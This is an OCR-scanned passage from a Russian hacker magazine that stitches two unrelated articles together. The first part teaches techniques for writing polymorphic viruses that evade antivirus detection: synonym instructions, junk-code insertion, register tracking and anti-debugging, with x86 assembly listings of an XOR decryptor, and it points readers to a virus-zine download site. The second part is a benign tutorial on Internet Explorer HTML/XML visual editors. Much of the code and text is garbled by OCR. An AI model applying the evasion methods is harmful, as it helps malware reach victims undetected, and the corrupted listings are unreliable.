но использовать практически любую комбинацию арифметическо-логичес- 
ких команд, только никакого смысла в этом нет. Все равно, если антивирус 
доберется до файла, он его поймает. 



лением адреса 

На первый взгляд, каждое последующее поколение вируса выглядит пол- 
ностью непохожим на предыдущее и по сигнатурам он уже не детектируется. 
Ведь если подобрать побольше команд-синонимов, количество возможных 
комбинаций может составить не один миллион. Тресни моя антивирусная ба- 
за! Тем не менее, в каждой позиции расшифровщика встречается строго оп- 
ределенная комбинация команд, поэтому специальный алгоритм отождес- 
твления сможет надежно ее распознать. Естественно, для этого антивирусни- 
кам придется потрудиться и запастись хорошей травой. Был как-то у одной 
такой компании мешок отменной травы, так за месяц скурили! Ну, это ладно. 
Не стоит забывать и про эмулятор. Расшифровав основной код вируса, 
разработчики запросто отождествят его по сигнатуре. Поэтому антиотла- 
дочные приемы должны быть! Здесь за уникальность можно уже не опа- 
саться (команды-синонимы делают свое), оттянувшись на полную катушку 
со всем набором ЗЗЕ и прочих векторных команд, до которых антивирус- 
ным эмуляторам еще ползти и ползти. 



[ступень 2: расшифровщик из кирпичиков] Идея: расшифровщик 
вируса имеет постоянный алгоритм, но состоит из произвольно выбирае- 
мой последовательности команд. Звучит страшновато, но реализуется три- 
виально. Возьмем в качестве наглядно-агитационного пособия расшиф- 
ровщик на основе ХОР, описанный выше. А теперь попробуем подобрать 
синонимы для каждой из слагающих его машинных команд (заботится об 
оптимизации необязательно). Получится примерно так: 



[ступень 3: самый мусорный] Идея: внедряем в расшифровщик му- 
сорные команды, не имеющие никакого побочного эффекта, но преобра- 
жающие код до неузнаваемости. Чаще всего используются различные ва- 
риации ІЧОР, которых насчитываются десятки (например, ХСНО ЕВХ, 
ЕВХ/МОѴ ЕСХ.ЕСХАІх $+2/ХСНО ЕАХ, ЕВХ; ХСНО ЕВХ, ЕАХ и т.д. — глав- 
ное фантазию иметь). 

Обработанный расшифровщик из листинга 4 после экзекуции может выг- 
лядеть, например, так: 



[инструкции И ИХ СИНОНИМЫ] 

МОѴ ЕЗІ,оІІзеІ ЬосІу_Ьедіп -> І_ЕА Е5І,ЬосІу_Ьедіп;МОѴ ЕЗЦоТТзеІ: 
Ьос1у_Ьедіп-ШС ЕЗІ; 

МОѴ ЕйІ, ЕЗІ -> РІІЗН ЕЗІ/РОР ЕОІ; ХОР Е0ЦЕ0І/А00 ЕйІ.ЕЗІ; 

ЮОЗВ -> МОѴ АЦ[Е5І]/ІІ\ІС ЕЗІ; ЗОВ АЦАІѴЗШ АЦЕЗірОТ АШС 
ЕЗІ/АОй АЦ1 

ХОР АЦ666 -> ХОР АЦ 6/ХОР АЦ 606 



Для каждой из команд шифровщика мы будем выбирать случайную после- 
довательность синонимов, как бы собирая шифровщик из кирпичиков. Ре- 
зультат нашей работы может выглядеть, например, так: 

[случайно сгенерированный расшифровщик] 

І_ЕА ЕЗІ, ЬосІу_Ьедіп 
РІІЗН ЕЗІ 
РОР ЕОІ 

МОѴЕСХ, оТТзеІ: Ьосіу_епсІ - ЬосІу_Ьедіп + 2 
ОЕС ЕСХ 
ОЕС ЕСХ 
ту_Ьедіп: 

МОѴАЦ, [ЕЗІ] 

ІІ\ІС ЕЗІ 
ХОР АЦ, 6 



[расшифровщик, разбавленный ничего 
не значащими мусорными командами] 

ХСНО ЕСХ, ЕСХ 
МОѴЕЗІ, оТТзеІ: ЬосІу_Ьедіп 
Ю $+2 
М0ѴЕ0І, ЕЗІ 
МОѴЕАХ, ЕАХ 

МОѴЕСХ, оіізеі Ьобу_епсІ - Ьобу_Ьедіп 
ИОР 

ту_Ьедіп: 

ЮОЗВ 
Ш $+2 
ХОРАЦ 666 
М0ѴЕ0ЦЕ0І 
ЗТОЗВ 
Л $+2 

ЮОР ту_Ьедіп 

Какие проблемы возникают при кодировании? Проблем много. Рассмотрим 
лишь две из них, как самые важные. Если не предпринять никаких усилий, 
уже через несколько поколений размер вируса вырастет до облаков и про- 
должит расти до тех пор, пока не упрется в конец адресного пространства 
(или отведенной приложению памяти). Чтобы этого избежать, необходимо 
либо вычищать имеющийся мусор перед добавлением новой порции (что 



сложно), либо включить в зашифрованное тело копию расшифровщика и 
всегда издеваться только над ней. 

А вот вторая проблема. Чтобы добавить мусорную инструкцию между двумя 
другими, необходимо как-то определить, где кончается одна и начинается 
другая. Вот для этого нам и нужен дизассемблер длин. Дизассемблер длин 
представляет собой до предела упрощенный х86-дизассемблер, декодиру- 
ющий инструкции и определяющий их границы. Это достаточно сложная за- 
дача, которая не имеет простых и красивых решений. Приходится зарывать- 
ся в формат кодирования машинных команд, а это целый исторический 
пласт с кучей наслоений. Когда-то мы дойдем и до него, но нельзя ли пока 
обойтись методом грубой силы? Можно! Некоторые вирусы определяют гра- 
ницы команд с помощью трассировки, так сказать, руками самого процес- 
сора. Но это все равно утомительно. Лучше (и быстрее!) определить грани- 
цы вручную и занести в специальную таблицу. Уродливо, зато эффективно. 
Как антивирусы справляются с такими файлами? Да очень просто! Вычища- 
ют весь мусор и натягивают на отстоявшийся «осадок» старую добрую сиг- 
натуру. Мусорные команды легко генерировать, но легко и распознавать! Так 
что данная методика крайне ненадежна и годится разве что для тренировки. 

[ступень 4: еще более мусорный] Идея: усложнить генерацию мусор- 
ных инструкций, сделав ее менее очевидной. Например, если мы видим: 
МОѴ ЕАХ,ЕВХ, то перед этим в ЕАХ можно писать все, что угодно. Все рав- 
но он будет заново проинициализирован. 

Более сложная задача: отслеживать обращения к регистрам, выявлять не- 
используемые регистры (как локально, так и глобально), и пихать в них вся- 
кую глупость. Для этого нужен не только дизассемблер длин, но и полно- 
ценный дизассемблер команд, определяющий, что это именно МОѴ 
ЕАХ,ЕВХ, а не что-то другое. Причем необходимо специальным образом 
обрабатывать флаги — встретив команду, зависимую от флагов (напри- 
мер, ^х), необходимо найти ближайшую к ней инструкцию, воздействую- 
щую на этот флаг, и между ними вставлять только тот мусор, который не 
оказывает на флаги никакого влияния. Разумеется, это сложно. Очень 
сложно. Зато такой эффект! 

[расшифровщик, замусоренный значащими командами] 

МОѴЕЗІ, ЕАХ 
ЭШВ ЕЗІ, ЕСХ 
ХСН6 ЕйХ, ЕВР 
І_ЕА ЕВХ, [ЕЗІ+ЕШ] 

Р0РАЦ8 

МОѴЕЗІ, оіізеі Ьосіу_Ьедіп 

ХОР ЕСХ, ЕСХ 

ЗІІВ ЕОІ, ЕАХ 

АООЕВР, ЕЗІ 

N01 ЕОІ 

М0ѴЕ0І, ЕЗІ 

МОѴЕСХ, оТТзеІ: ЬосІу_епсІ - ЬосІу_Ьедіп 

САН $+5 

ЗІІВ ЕАХ, ЕСХ 

N01 ЕВР 

РОР ЕВХ 

ХОР ЕАХ, ЕАХ 

РІІЗН ЕВХ 

ЗОВ ЕВР, ЕСХ 

ПЮЗВ 

МОѴ ЕАХ, ЕАХ 
№0 ЕОХ, ЕЗІ 
ХСН6 ЕВХ, ЕВХ 
ХОРАЦ 66І1 
ХОР ЕОХ, ЕОХ 
А00 ЕАХ, ЕОХ 
ЗТОЗВ 

МОѴЕВР, ЕАХ 
ОЕС ЕСХ 
ХСН6 ЕВХ, ЕВХ 
МОѴЕВР, ЕЗІ 
Ш $+4 
ЛѴІР ЕВХ 
ЬосІу_Ьедіп: 

; //тело вируса со всеми остальными шифровщиками 
ЬосІу_епсІ: 



щих инструкции, замыкающие граф. Например, МОѴ ЕАХ, ЕВХ ~> АЭЭ 
ЕАХ, ЕСХ -> МОѴ ЕАХ, ЕСХ. Последняя команда перекрывает результат 
деятельности первых двух, выдавая их галимую мусорную природу. Реали- 
зовать полиморфный генератор четвертого уровня намного проще, чем 
разработать лекарство, так что антивирусники тут находятся в проигрыше. 
Кстати говоря, без дизассемблера можно и обойтись, воспользовавшись 
псевдокодом. В этом случае код шифровщика будет выглядеть так: 

[псеводокод простейшего шифровщика] 

М0Ѵ$К1 , оіізеі ЬосІу_Ьедіп 

М0Ѵ$КЗ, оЯвеІ Ьойу_епсІ - Ьойу_Ьедіп 

М0Ѵ$КЗ, $ІР 

Х0К[$М],66Іі 

А00$М, 1 

ЗІІВ$В2, 1 

Л\І2 $КЗ 

Тогда наша задача сведется к написанию кодогенератора для х86, что нам- 
ного проще. Наш псведокод может быть построен по самым демократич- 
ным принципам и иметь фиксированные длины инструкций. В псевдокоде 
допустимо напрямую адресовать регистр ЕІР, переложив заботу на кодоге- 
нератор, который, кстати говоря, можно выдрать из любого ОрепЗоигсе 
компилятора. Это тем более замечательно, что кодогенератор имеет мно- 
жество различных опций, порождающих различный код (например, код для 
8088 и 386 процессоров). Антивирусы идут в глухой отруб! 

[ступень 5: дальше только небо] Пятый уровень — это наивысший 
уровень полиморфизма. Он комбинирует методы всех нижележащих 
уровней, добавляя к ним множество новых фич. Во-первых, это динами- 
ческая генерация шифровщика/расшифровщика. Вместо того чтобы 
модифицировать фиксированный набор заранее подготовленных рас- 
шифровщиков, вирус их создает самостоятельно по случайному закону. 
Это очень сложная задача, требующая боевого опыта и длительной ма- 
тематической подготовки. 

Полиморфный генератор решает, с каким типом данных он будет работать, 
в каком направлении будет происходить шифровка (от начала к концу или 
от конца к началу), сколько делать проходов, какие арифметические или 
логические операции выбрать и т. д. Прямая трансляция в х86-код исполь- 
зуется редко. Обычно вирус генерирует промежуточный псведокод, струк- 
тура которого заточена под нужды данной задачи, а потом уже переводит 
его в родные машинные команды. 

Более продвинутые полиморфики вообще отказываются от расшифров- 
щика и модифицируют непосредственно само вирусное тело. Это архис- 
ложная задача, которую в полном виде до сих пор никто не решил. Уси- 
лий тут требуется просто море. Зато какой куш нас ждет! Адекватных 
методик детектирования подобных вирусов до сих пор не разработано, 
и вряд ли они появятся в дальнейшем. Программистам здесь делать по- 
ка нечего. Сначала тут должны поработать математики. Необходимо на- 
учить компьютер распознавать смысл совокупности машинных команд, 
а это уже из области АІ, работы над которым были свернуты еще в кон- 
це семидесятых. Автоматическая декомпиляция невозможна! А вот ком- 
пиляция — очень даже вполне! Так что появление очередных полимо- 
рфных монстров уже не за горами. 

[заключение или прокалывая небо] Вот уже статья подошла к сво- 
ему концу, который как ни оттягивай, все равно наступает, а готовых при- 
меров полиморфных генераторов в ней не наблюдалось. Почему? Да пото- 
му, что даже самый простейший пседвополиморфный вирус в статью прос- 
то не влезет. Даже если сосредоточиться на ключевых фрагментах генера- 
тора, нам потребуется стопка листов формата АІ . Лучше взять готовый ис- 
ходник (благо недостатка в них не наблюдается, сходи хотя бы на 
ѵх.пеііих.огд и скачай все вирусные журналы) и проанализировать его. А 
эта статья поможет понять назначение отдельных вирусных частей, опре- 
делив степень его полиморфизма и выбранный алгоритм. 

Что ж! Как говориться, дорогу осилит идущий. Кстати говоря, что-то до сих 
пор не слышно про вирусы под платформу х86-64 (она же АІѴЮ-64). Непра- 
вильно это! В следующей статье мы покажем, какие преимущества дает пе- 
реход на новые процессоры от АІѴЮ, и как начать писать ассемблерные 
программы под нее. Как-никак, это последнее радикальное изменение ар- 
хитектуры со времен 386, у которого есть неплохие шансы потеснить Іпіеі и 
занять свое место под солнцем. Немного забегая вперед, скажем, что 
иметь для этого 64-битный процессор хоть и желательно, но необязатель- 
но. На первых порах можно воспользоваться и эмулятором, а потом уже ре- 
шать — нужна ли нам эта технология или нет © 



Антивирусу, чтобы распознать этот код потребуется реализовать сложную 
систему графов, анализирующих зависимости по данным и отбрасываю- 
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Что ВИДИМ - 

то и получаем 




ВРЕМЯ ИДЕТ, И ВСЛЕД ЗА РАЗВИТИЕМ ѴѴЕВ- 
ТЕХНОЛОГИЙ МЕНЯЮТСЯ ТЕНДЕНЦИИ И АКТУ- 
АЛЬНЫЕ, «МОДНЫЕ» ФИШКИ. ВОТ СКАЖИ МНЕ, 
ДЕСЯТЬ ЛЕТ НАЗАД, КОГДА СДЕЛАТЬ СОБ- 
СТВЕННЫЙ НТМЬДОКУМЕНТ И ЗАЛИТЬ ЕГО НА 
БЕСПЛАТНЫЙ АМЕРИКАНСКИЙ ХОСТИНГ — БЫ- 
ЛО НАСТОЯЩИМ ПРОРЫВОМ, МОЖНО ЛИ БЫ- 
ЛО ПРЕДСТАВИТЬ СЕБЕ, ЧТО СКОРО ЛЮБАЯ 
СЕКРЕТАРША СМОЖЕТ ЛЕГКО МОДИФИЦИРО- 
ВАТЬ, СОЗДАВАТЬ И ОФОРМЛЯТЬ ѴѴЕВ-КОН- 
ТЕНТ НА КОРПОРАТИВНОМ САЙТЕ? А СЕЙЧАС 
— ЛЕГЧЕ ПРОСТОГО! НЕТ НИЧЕГО СЛОЖНОГО 
В ТОМ, ЧТОБЫ СДЕЛАТЬ ИНСТРУМЕНТ ДЛЯ ВИ- 
ЗУАЛЬНОГО — КАК В ВОРДЕ — РЕДАКТИРОВА- 
НИЯ НТМІ_- И ХМЬДОКУМЕНТОВ. СЕЙЧАС Я 
РАССКАЖУ ТЕБЕ О ТОМ, КАК ФУНКЦИОНИРУ- 
ЮТ ТАКИЕ РЕДАКТОРЫ И КАК МОЖНО ПРИКРУ- 
ТИТЬ ИХ К СОБСТВЕННОЙ СИСТЕМЕ I ею'о 



Создание систем визу- 
ального проектирова- 
ния контента 

Тема, о которой я тебе сейчас расскажу 
очень актуальна. Если ты посмотришь на лю- 
бой коммерческий движок для сайтов, в лю- 
бом из них будет возможность визуального 
редактирования материалов сайта. Удобный 
инструмент, с помощью которого любая 



т 



блондинка сможет вставлять в 
текст картинки, создавать ги- 
перссылки, менять шрифт тек- 
ста и добавлять таблицы — это 
стандарт, жесткая необходи- 
мость. И понять это можно — за- 
чем держать какого-то левого 
человека, который будет обно- 
влять сайт, добавляя сотни ПІтІ- 
документов вручную. Нормаль- 
ные люди давно поняли, что луч- 
ше один раз заплатить за толко- 
вый движок, чем каждый месяц 
платить деньги за мифическую 
«поддержку сайта». Поэтому си- 
стемы визуального редактиро- 
вания контента нынче в ходу, и 
не только, кстати говоря, для си- 
стем управления ѵѵеЬ-сайтами. Но об этом 
час же я начну с простого — расскажу, как 
ное редактирование ПІтІ-документов. 




Я, разумеется, о многом не 
смог рассказать в этой 
статье — просто места не 
хватило. Поэтому не же- 
лаю видеть критику, что я 
о чем-то не написал. Я на- 
писал, о чем счел нужным, 
а что-то оставил тебе на 
самостоятельное изучение. 
Материалов на диске и 
ссылок — навалом. 

Перевод отличной статьи 
по редактированию ХМІ с 
использованием ХМІ 
Зсііета: іііірУ/ппЬегд.па- 
гоб.ги/бос/хті-зсііета-хзіі. 

мы еще поговорим. Сей- 
осуществляется визуаль- 



[начнем с простого] Давай подумаем, как может работать ви- 
зуальный ѵѵеЬ-редактор. От этого инструмента требуется, чтобы, в 
ответ на определенные действия пользователя, он изменял ПІтІ- 
код документа и сразу отображал эти изменения. Совершенно по- 
нятно, что все это должно происходить в тесном взаимодействии 
с браузером: в конце концов, именно он показывает документ 
пользователю. Оказывается, что разработчики из МісгозоК про- 
явили дальновидность и встроили в Іпіегпеі Ехріогег пятой версии 




Ссылки на статьи в М$Ш; 

Шр://тзбп.тісго- 

зоП.сот/НЬгагу/де- 

ІаиІІ.азр ?игІ=/тгкзІюр/аиі 

Іюг/еШііпд/Шогі- 

аІ5/ЫтІ_еШіог.азр 



поддержку специального режи- 
ма редактирования: любой эл- 
емент сіоситепі в объектной 
модели имеет свойство сіезідп- 
Мобе, после установки которо- 
го в положение Оп происходит 
удивительная вещь: содержи- 
мое этого элемента становится 
открытым для редактирования, 
причем все изменения подхва- 
тываются и отображаются брау- 
зером «на лету». Вообще гово- 
ря, в этом режиме доступны все 
возможности стандартного ре- 
дактирования документов: до- 
бавление стандартных объек- 
тов, изменение их свойств и 
т.д. Все эти функции доступны 
через различные методы и 
свойства редактируемого эл- 
емента. Соответственно, конеч- 
ному пользователю необходимо 
предоставить понятный интер- 
фейс для вызова этих проце- 
дур, для редактирования содер- 
жимого. Но довольно слов, да- 
вай перейдем к делам. 

Первым делом необходимо соз- 
дать контейнер, НІтІ-элемент, ко- 
торый будет содержать в себе редактируемый документ. Им может быть 
как фрейм (іігате), так и область сііѵ — это не так уж и важно. Мы оста- 
новимся на варианте с фреймом, поскольку он чуточку проще. Итак, 
создать элемент-контейнер можно следующим образом: 




ШрУ/тзбп.тісго- 
зоП.сот/НЬгагу/бе- 
Іаиіі.азр ?игІ=/ІіЬгагу/еп- 
из/бпхтІтЬМтІ/хтШосе- 
біі.азр 

Шр://тзбп.тісго- 
зоП.сот/НЬгагу/бе- 
ІаиІІ.азр ?игІ=/тгкзІюр/аиі 
Ію г/Ьей а ѵіогз/о ѵегѵіе ш/еіе- 
тепіЬ_оѵ\л/.азр 

На нашем диске ты най- 
дешь доведенный до ума 
майкрософтовский ХМІ- 
редактор, а также хороший 
и наглядный пример ХМІ- 
документа со схемой ре- 
дактирования. Если наду- 
маешь разобраться, начи- 
най смело с нее. 



сіігате ій="есііШе"> 

Сопіепі 

</іТгате> 



Теперь, чтобы превратить этот фрейм в полноценный редактор, нужно 
всего лишь выполнить элементарный код: 

сіоситепІІгате5["есііШе"].сІоситепІсІе5ідпМосіе = "Оп"; 



На практике инициализацию редактора удобно вынести в отдельную 
функцию, которую можно указать в качестве обработчика ОпІ_оасІ в ко- 
ренном документе. Примерно вот так: 

[инициализация редактора] 

<НТМЬ 

<НЕАОхТІТІ_Е>...<ЯІТІ_Е> 

<ЗСВІРТ ЕАЫ01ІАСіЕ='^Зсгір1:"> 

ѵаг есі = пиІІ; #Глобальная переменная, указатель на наш редактор 
Іипсііоп іпіІЕй() { 

ей = йоситеп11гатез["есШМе"].йоситеп1; #Получаем наш фрейм и 
присваиваем переменной есШог указатель на него 
ей.йезідпМосіе = "Оп";#Включаем режим редактирования 
ей.ореп(); 

ей.ѵѵгіІе("<М>Тестовая страница</МхЬг><ІопІ соІог=Ыие>Синий, 
прекрасный текст</1опЬ");#Записываем начальное содержимое 
ей.сІозе(); 

} 

</ЗСВІРТ> 

</НЕАй> 

<ВСЮѴ опІоасі="іпіІЕс]()">...</ВООУ> 

</НТМЬ 



Если ты вставишь этот код в блокноте, сохранишь файл с расши- 
рением ГіітІ и откроешь в браузере ІЕ, то увидишь редактируемую 
область, куда можно будет легко добавлять текст, вводя его пря- 
мо с клавиатуры, как в обычном редакторе. Может, тебя это уди- 
вит — ведь до этого ты думал, что текстовое содержимое можно 
менять только в полях форм, а уж с іігате ничего такого невоз- 
можно. Но ведь нужно иногда удивляться, верно? 

Еще больше восторга вызовет тот факт, что в этот фрейм можно бу- 
дет легко вставлять все остальные элементы: изображения, гиперс- 
сылки, сложные фрагменты ГЛтІ и т.д. Более того, будет работать 




доступный на сайте МЗйІЧ пример простого визуального редактора 



функция отмены изменений — ипбо. Кстати, она работает уже сей- 
час. Попробуй что-нибудь написать во фрейме и потом нажми сігі +7. 

— текст вернется в предыдущее состояние. Однако как обеспечить 
всю остальную функциональность нашего редактора? Очень просто: 
нужно добавить редактору несколько кнопочек, на каждую из кото- 
рых повесить своего обработчика нажатия — функцию, которая бу- 
дет выполнять требуемое действие. Ну, скажем, делать выделенный 
текст жирным или зеленым. 

Чтобы идти дальше, нам нужно разобраться еще с одним объектом 

— Вапде, содержащим выделенную область текста. У редактируе- 
мого объекта есть еще один объект зеІесНоп, среди методов кото- 
рого присутствует функция с говорящим названием: сгеаІеВапде. 
Да, именно она создает объект гапде, соответствующий выделенно- 
му в данный момент тексту: ѵаг гапде = есІіІог.зеІесІіоп.сгеаІеВап- 
де(). После этого уже можно работать с выделенным текстом при 
помощи ехесСоттапсІ, либо напрямую изменяя свойство гапдеЛехТ 
Чтобы было понятнее, я покажу на примере, как создать и как вы- 
зывать функцию, которая будет оформлять выделенный кусок тек- 
ста курсивом, или делать его, скажем, зеленым. Первым делом 
необходимо создать кнопку, по нажатии которой будет осущест- 
вляться определенное действие: 

<ІМРІІТ ТѴРЕ= М ВІІТТ(Ж ѴАШЕ=Т 0ЫСиСК= І, 5етаІіс() Ю="ІУ іс""х/ІЫРІЯ> 

После этого рядом с функцией инициализации редактора нужно создать 
еще одну элементарную процедуру: 

Іипсііоп зеШіс() { 

ѵаг гапде = есМог.зеІесІіоп.сгеаІеВапдеО; 
гапде. ехесСоттапй("ІІаІіс"); 

} 

Теперь, если ты нажмешь на кнопку «I», выделенный текст станет на- 
клонным. А что, если нажать на кнопку, не выделяя при этом текста? Ни- 
чего не произойдет, поскольку ехесСоттапсІ даже не будет выполнять- 
ся для пустого Вапде. С другой стороны, было бы не плохо, наверное, 
чтобы в исходный код вставился определенный тэг оформления и дан- 
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ные, вводимые пользователем, помещались внутрь этого нового эл- 
емента. Для этого можно использовать такой трюк: если выделенная 
область пуста, помещать туда какой-то невидимый символ. Затем пере- 
мещаться на позицию назад и заключать это «пустое» содержимое в 
оформительский контейнер. Поэтому функцию зеШаІіс() можно перепи- 
сать следующим образом: 

Іипсііоп зеШІіс() { 

ѵаг гапде = есШог.зеІесІіоп.сгеаІеВапде(); 
і! (гапде.ІехІІепдФі == 0) { 
гапде. раз1еНТМЦ"&пЬзр;"); 
гапде. тоѵеЗІагІ("сііагасІег", -1); 
гапде. зеІесі(); 

} 

гапде. ехесСоттапсІ("ІІаІіс"); 

} 



Обрати внимание на свойство гапде.ІехІ.ІепдІП — как легко понять из 
приведенного кода, здесь находится длина выделенного текста. Соот- 
ветственно, если ничего не выделено, то этот параметр равен нулю и мы 
вставляем на то место, где находится курсор, пробел (&пЬзр; в ипісобе), 
перемещаемся на символ влево и производим выделение области, по- 
сле чего применяем команду ехесСоттапсІ(ІІаІіс). Теперь, если пользо- 
ватель начнет вводить текст после нажатия кнопки «I», он будет офор- 
мляться курсивом. 

[веселые картинки] Думаю, ты уже должен был догадаться, каким 
образом можно вставлять в документ картинки. Конечно, нам опять по- 
требуется кнопка, на которую мы повесим обработчик іпзегіітд: 

<ІЫРУТ ТУРЕ^'ВиТТОЫ" ѴАШЕ= М І М 0ЫСиСК=1п5еП1тд() Ю^'ітд-х/ІЫРи^ 



[редактируем хті] А мы, тем временем, подобрались к кульминации 
— сейчас мы поговорим о визуальном редактировании ХМЬданных. На 
первым взгляд может показаться, что это мало чем отличается от редак- 
тирования НТМІ_. Однако это совершенно не так: здесь огромная куча 
трудностей, которую порождает, прежде всего, сам стандарт ХМІ_, за 
строгость которого мы его так любим :). Прежде всего, нужно ответить на 
вопрос: что понимается под «визуальным редактированием» ХМІ_? При- 
рода и суть формата такова, что отрицает саму возможность какой-то 
оформительной привязки внутри документа, более того, в общем случае 
ХМІ_-документ вообще не является атомарным текстовым носителем. Он 
запросто может описывать строение пассажирского самолета, вывод ма- 
тематической формулы, биохимический процесс, векторное изображе- 
ние. Поэтому под «визуальным редактированием» мы будем понимать 
редактирование, преобразованное к конкретному графическому пред- 
ставлению документа. Логично, что такое преобразование удобно вы- 
полнять при помощи инструмента Х8І_Т. И здесь встает еще одна, уже 
более весомая проблема. Формат ХМІ_ — очень строгий, относительно 
ПІтІ. И когда мы преобразовываем строгие ХМІ_-данные в ИІтІ-помойку, 
невозможно допустить и мысли о свободном редактировании этого ПІтІ- 
документа, поскольку провести «обратную операцию» по сборке в хті 
будет, в ряде случаев, невозможно. Как говорят, будет нарушена целост- 
ность документа. Поэтому редак- 
тирование ХМІ_-данных лишено 
смысла, если при этом не учитыва- 
ется структура документа. Необхо- 
дим какой-то инструмент для кон- 
троля действия пользователя, что- 
бы при редактировании, во-пер- 
вых, соблюдались правила ХМІ_, а 
во-вторых, не нарушалась структу- 
ра самого документа. Г де же взять 
такой инструмент? 

Если ты читал какие-то статьи об 
ХМІ_, то должен знать, что есть та- 
кая штука, как ОТО — Эоситеп! 
Туре ОеТіпіІоп. Это своего рода 
макет ХМЬдокумента, набор пра- 
вил, который позволяет отличать 
«правильные» документы от «не- 
правильных». Однако механизм 
ОТО не может обеспечить нам 
требуемой строгости и корректно- 





Сама функция выгладит примерно следующим образом: 



Іипсііоп іпзеіІІтдО { 
ѵаг ітд = рготрІ("Веди имя", "Іііе.ірд"); 
ѵаг гапде = еШІог.зеІесІіоп.сгеаІеВапде(); 
гапде. разІеНТМІ_("<ітд 5гс=" , +ітд+'">"); 

} 




Эта процедура запрашивает у пользователя имя вставляемой картин- 
ки, а затем вставляет вместо выделенного текста (если выделение пу- 
стое, то просто на позицию курсора) ПІтІ-тег <ітд>, соответствующий 
вставляемой картинки. Правда, проще простого? Думаю, для тебя не 
будет проблемой написать еще несколько функций, которые будут 
выделять текст жирным, или различными цветами. Если ты всерьез 
заинтересуешься этой темой, настоятельно рекомендую тебе обра- 
титься к документации на сайте МЗЭЫ. Набрав в поиске Ноѵѵ Іо Сгеа- 
Іе ап НТМІ_ ЕсМІог Арріісаііоп, ты сразу найдешь ссылку Шр://тзсІп.тіс- 
гозоН.со т/ІіЬ га гу/деіа и I і. аз р ? и г!=/ѵѵ о гкз /? о р/а иіію г/есііііпд/іиіогі - 
аІз/ЫтІ_есІііог.азр, по которой доступна прекрасная статья, описываю- 
щая процесс создания нехитрого визуального редактора. На этом 
сайте можно легко найти описание всех функций и методов, исполь- 
зуемых для визуального редактирования. Если у тебя поганый Интер- 
нет, ты так же можешь обратиться к нашему диску и получить всю 
требуемую документацию оттуда. 



визуальный редактор ХМЬдокументов 



сти документа, кроме того, этот инструмент не предоставляет удобных 
механизмов для редактирования данных. Дня наших нужд значительно 
больше подходит язык ХМЬсхем — ХМІ_ ЗсПета, который, во-первых, 
позволяет максимально строго описать структуру документа, и во-вто- 
рых, вкупе с Хирбаіе, предоставляет удобные механизмы для редакти- 
рования документа. 

[доверимся Місгозоіі] Если вновь обратиться к сайту МЗЭГѵІ, можно 
довольно быстро найти интересную статью ХМІ_ Есііііпд: А ѴѴУЗІѴѴУО 
ХМІ_ Эоситепі ЕсШог (Мір://тзсіп.тісгозоіі.сот/ІіЬгагу/сІеіаиІі.азр?игІ=/Іі- 
Ьгагу/еп-из/6пхтІУчеЬМтІ/хт16осе6і\.азр). 

Этот материал комплектуется примером готовой системы по редак- 
тированию ХМІ_. Разработчики Місгозоіі, по непонятной мне причине, 
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Вообще здесь можно сказать много слов, но лучше посмотреть, как это 
выглядит на практике. 




редактируемый хті-документ 



не используют связку ХМІ_ ЗсИета + Хирсіаіе и городят собственный 
огород, заточенный именно под нужды редактирования. Однако ког- 
да хоть что-то уже готово, всегда хочется использовать именно это. 
По этой причине мы с тобой воспользуемся именно наработками 
майкрософтовцев. Во-первых, научимся их использовать, а во-вто- 
рых, добавим некоторую функциональность. 

[копаем внутри] Если ты откроешь главную страничку редактора, то 
на самом верху увидишь следующие строки: 

<з!уІе> 

.есіх { Ьеііаѵіог:игІ(есіх.ІіІс); } 

</зІуІе> 

Теперь если опуститься в самый низ документа, ты увидишь главный 
ЭІѴ-контейнер с редактируемым контентом. Среди его параметров ука- 
зан следующий: сІазз=есІх. Все это означает, что для создания редакто- 
ра используется механизм ИітІ-ЬеІіаѵіогз, с помощью которого програм- 
мисты могут определять собственные НТМІ_-документы, с собственным 
набором свойств и методов, с которым можно работать абсолютно так 
же, как и с любым стандартным элементом. Это действительно удобный 
пример, почитать подробнее о котором ты можешь все на том же М5ЭІ\І: 
М1р://тздп . тісгозоіі. сот/НЬга гу/беіа иіі.азр ?игІ=/ѵѵогкзІіор/аиіІіог/ЬеІіа - 
ѵіогз/о ѵегѵіе ѵѵ/еІетепіЬ_о ѵѵѵ.азр. 

Не вдаваясь в подробности, отмечу, что в файле ебх.ИІс, содержимое 
которого ты можешь видеть на соответствующем скрине, содержится 
перечисление всех методов и свойств элемента; там же подключаются 
Із-файлы с описанием всей функциональности нового объекта. 

[контроль за редактированием] Редактируемый при помощи май- 
крософтовского примера документ должен содержать в себе информа- 
цию о том, как он должен отображаться и редактироваться. Это опреде- 
ляется во внешнем файле, чья роль носит ключевой характер во всем 
процессе редактирования. 

Указывается этот файл следующим образом: 

<?есІхѵіе\А/ рго-ѵіе\д/.хтІ?> 

Думаю, всем уже понятно, что этот файл сам по себе является ХМ І_- докумен- 
том. Однако его содержимое заставляет поговорить о себе более подробно. 
Весь файл состоит из шаблонов, которые задаются тэгом ес1х:1етр1а1е. 
Шаблонов может быть сколько угодно, и для каждого ХМЬузла задает- 
ся конкретный шаблон, при помощи которого будет отображен этот эл- 
емент. Обработка начинается с коренного шаблона, который содержит 
в себе ссылки на другие шаблоны, каждый из которых обрабатывает до- 
черние элементы. Совершенно понятно, что шаблоны, обрабатываю- 
щие эти дочерние элементы также могут содержать ссылки на другие 
темплейты, и так до тех пор, пока мы не дойдем до текстовых данных: в 
этом случае, как правило, используется встроенный шаблон с именем Іі- 
еІсІ:ТІо\л/, который просто выводит текстовое содержимое элемента. 

У каждого шаблона обязательно есть свойство Іуре: оно может содер- 
жать либо гедіоп, либо сопіаіпег. В первом случае подразумевается, что 
соответствующий шаблону элемент содержит в себе разношерстные уз- 
лы, и для каждого из них будет указан соответствующий темплейт. Во 
втором же случае имеется в виду, что узлы однотипные, и обрабатыва- 
ются при помощи одного и того же шаблона, как бы в цикле. 



[коренной шаблон] 

<есІх:ІетрІаІе пате="гооГ Іуре="гедіоп" иіпате="ЕпІіге ОоситепГ> 
<есІх:хІіІтІ сМзрІау="стандартный"> 

<Ь 5ІуІе="ІопІ-зі2е:14рІ;ІопМатіІу:агіаІ" есМетр1а1е="йе1с1:Т1о№" ебх- 
раШ="аі1ісІе/ІіеасІЛШе"/><Ьг/><Ьг/> 

<Ь 5ІуІе="ІопІ-5І2е:12рі;ІопІ-ІатіІу:агіаІ" еіМетрІаІе="ІіеШ:ІІоѵѵ" ебх- 
раШ="аі1ісІе/ІіеасІ/соттепГ/><Ьг/><Ьг/> 

<Ь 5ІуІе="ІопІ-5І2е:12рІ;ІопМатіІу:агіаІ" е(МетрІаІе="аиШогз" ебх- 
